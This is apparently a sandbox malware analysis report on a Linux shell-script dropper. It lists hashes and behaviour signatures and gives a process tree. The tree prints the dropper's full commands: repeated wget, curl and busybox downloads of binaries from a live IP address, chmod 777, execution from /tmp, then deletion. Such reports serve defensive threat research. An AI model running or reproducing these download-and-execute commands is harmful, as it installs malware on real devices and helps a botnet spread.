Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
-
Size
10KB
-
MD5
8695c3f5bc9a782d939a590ce31f75f3
-
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
-
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
-
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
-
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:746
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:756
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:762
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:775
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:782
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:796
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:827
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:849
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:870
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:876
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:882
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:888
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:894
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:900
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:906
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:912
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:918
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:924
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:930
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:936
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:942
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:948
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:954
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:960
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:966
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:972
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:978
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:984
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:990
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:993
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97